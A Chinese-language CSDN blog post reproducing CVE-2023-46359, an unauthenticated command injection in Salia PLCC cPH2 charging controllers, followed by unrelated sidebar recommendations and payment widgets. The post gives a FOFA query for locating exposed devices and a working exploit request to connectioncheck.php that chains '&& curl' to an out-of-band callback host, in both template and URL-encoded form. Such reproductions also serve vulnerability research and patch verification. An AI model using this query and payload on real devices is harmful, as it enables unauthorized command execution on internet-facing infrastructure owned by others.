【漏洞复现】Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

已于 2024-03-08 13:03:07 修改
阅读量862 收藏 5
点赞数 16
分类专栏: 漏洞复现 文章标签: 安全 网络
于 2024-03-08 12:52:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136558918
版权

0x01 漏洞概述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

0x02 测绘语句

fofa:"Salia PLCC"

0x03 漏洞复现

​
payload:GET /connectioncheck.php?
ip=url_encode(127.0.0.1 && curl http://dnslog) HTTP/1.1

漏洞复现:GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2F4kpxqqvqog8u6p2ew6xzh3c7jypvdr1g.oastify.com HTTP/1.1

​

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 16
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
埃博拉患者萨利亚(Salia)病逝的治疗经历
weixin_30530523的博客
06-09 65
转载于:https://www.cnblogs.com/jhcelue/p/6973485.html
快讯:埃博拉患者Martin Salia去天堂了
袁萌专栏
11-18 2623
以下是Martin Salia外科医生的遗像:         11月17日,埃博拉重病患者Martin Salia外科医生死了。请见:Ebola patient Dr. Martin Salia dies in Omaha。          11月15日,外科大夫Martin Salia从塞拉利昂返回美国求治时,在电话中对妻子说:我爱你(I love you)!妻子在电话中立即
【译】2021年国外十大AI自动写作软件评测
热门推荐
年届35+,觉得不会Python的外贸人,不是合格的数据分析师和互联网淘金者。
11-11 1万+
原文及作者: 原文: Top 10 AI Writer Applications Review 2021 作者: Rose Salia Rose Salia是一位具有多年经验的高级科技作家。Rose对人工智能和科技行业中所有新奇有趣的事物都有着极大的热情。这就是为什么她可以为你带来不同的人工智能故事,包括最新的人工智能应用程序、惊人的deepfake工具,以及革命性的深度学习和GPT-3。 Rose有很多AI相关的文章很不错,有兴趣的记得留言提醒我扒过来一起康康! 比如: Top 10 AI Animat
世界目光聚焦美国:埃博拉病患者是否认真是可以治愈的?
weixin_30765505的博客
10-01 50
11月15日,一名在塞拉利昂工作的外科医生Martin Salia先生,身患埃博拉重症(二期),乘坐专机飞回美国Omaha医疗中心求治,此事,吸引了全球目的目光。 此前,有8名埃博拉患者在美国境内被成功治愈出院,一名患者死亡。Sala医生是在美国境内治疗的第十位埃博拉患者(二期病人)。此刻,全球目光聚焦于此。 美国有治愈...
全球目光聚焦美国:埃博拉重病患者能否治愈?
袁萌专栏
11-16 2304
11月15日,一名在塞拉利昂工作的外科医生MartinSalia先生,身患埃博拉重症(二期),乘坐专机飞回美国Omaha医疗中心求治,此事,吸引了全球目的目光。            此前,有8名埃博拉患者在美国境内被成功治愈出院,一名患者死亡。Sala医生是在美国境内治疗的第十位埃博拉患者(二期病人),此刻,全球目光聚焦于此,             美国有治愈埃博拉疾病的特效药物吗?未
研制埃博拉疫苗与科学家的奇思秒想
weixin_30781433的博客
03-06 77
请看下图: 外科医生萨利亚(Salia)得了埃博拉疾病,不治身亡。生前服用抗埃博拉病毒药物ZMApp,引起人们的好奇心。ZMAs到底是什么药物?怎么制造出来的?上图是制造ZMApp的流程。 上图左上方是一仅仅实验小白鼠,右上方是人的骨髓细胞,再从蝙蝠身上提取抗埃博拉病毒的抗体(Antibody),利用基因project...
我国援非抗埃博拉医疗队员胜利凯旋
袁萌专栏
11-18 2825
请看以下相片:   图为援塞移动实验室医疗检测队总队长刘柳(右)在回国后与妻子(解放军302医院感染病中心研究室主任)陈威巍不能握手、拥抱、亲吻,只能肘部相碰合影。         根据有关资料,抗击埃博拉的医护人员已有570多人被感染(埃博拉病毒),其中324人死亡。MartinSalia外科医生便是一例。这说明,遗
Fortinet的安全愿景SASO概述
lurenjia404的博客
05-06 807
FTNT SASE的独特方法,使其成为一家适应性极强的厂商,能够应对不断变化的网络和网络安全环境。FTNT开发了一种名为Secure Access Service Omni(SASO)的变体,以更准确地反映FTNT在融合网络和安全功能方面的实力。我们预计,从长远来看,SASO将逐渐取代SASE。
API安全
2301_76717406的博客
05-01 1785
网络安全,信息(数据)安全,应用安全;机密性完整性可靠性。
域控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1200
大家还记得内网渗透的初衷吗???找到域馆,拿下域控!!拿下了域控就是拿下了整个域!!但是大家知道拿下域环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
网络安全实训Day16
Yisitelz的博客
04-26 2336
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
WAAP动态安全解决方案
m0_66268916的博客
05-03 776
在此情况下,德迅云安全WAAP应运而生。7、协同防护:通过全站防护管理平台,对网络L3-L7层各防护模块的安全策略进行统一管理,并通过数据聚合、情报协同,形成真正的纵深防护,简化运营工作的同时进一步提升整体安全的防护水位。5、互联网暴露面资产发:通过平台和人工服务的方式,对域名、IP及关键字的综合查询及关联分析,提供互联网资产的发、识 别、监测、稽核等服务,帮助用户发和梳理互联网资产;二、全站防护,在事中阶段,从网络安全、应用安全、业务安全、API安全各层面,为Web应用提供全面安全防护闭环。
Linux线程安全,互斥量和条件变量
m0_74189279的博客
05-05 1035
因此第二次申请锁失败之后这个线程就会被挂起,但是它是拿着锁被挂起的,因为被挂起了,所以就没办法释放锁,也就不会被唤醒,因此该执行流就处于一种死锁的状态了。由于–需要三条汇编指令才能完成,所以有可能线程1即thread1在执行完load 指令将共享变量ticket(1000)从内存加载到寄存器中之后就被切换了,此时thread1读到的数据是1000,当thread1被切换之后,寄存器中的数据会被当成thread1的上下文数据被保存起来,等到thread1被切回来的时候,再次恢上下文。
2024 怎么从一个小白到一名黑客,自学笔记
最新发布
2401_84466225的博客
05-08 746
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
深入理解网络原理2----UDP协议
m0_74299308的博客
05-04 541
随着时代的发展,越来越需要计算机之间互相通信,共享软件和数据,即以多个计算机协同⼯作来完成业务,就有了⽹络互连。
题目 1452: 网络寻路
weixin_64443786的博客
05-01 242
蓝桥杯
【 网络原理 1】 网络编程原理基础知识
Y_1215的博客
05-06 712
这里会详细介绍IP地址、端口号、协议、协议分层、封装、分用、客户端、服务器、请求、响应、两台主机之间的网络通信流程 网络原理知识IP地址(Internet Protocol Address):它是分配给设备以在网络上识别和通信的唯一标识符。IPv4地址由32位二进制数表示,通常以点分十进制表示,如192.168.1.1。IPv6地址则由128位二进制数表示,通常以八组十六进制数表示。端口号(Port Number):在网络通信中,端口号用于标识特定的应用程序或服务。
某塑料科技公司网络与机房监控运维项目
zhtelecom的博客
05-06 627
通过部署智和信通综合监控运维方案实时监控用户网络与机房内大量异构的交换机、路由器、服务器、AC/AP、数据库、防火墙、虚拟机、语音网关、硬盘录像机、行为管理等设备,及时发并预警潜在问题,从而避免或减少故障带来的负面影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值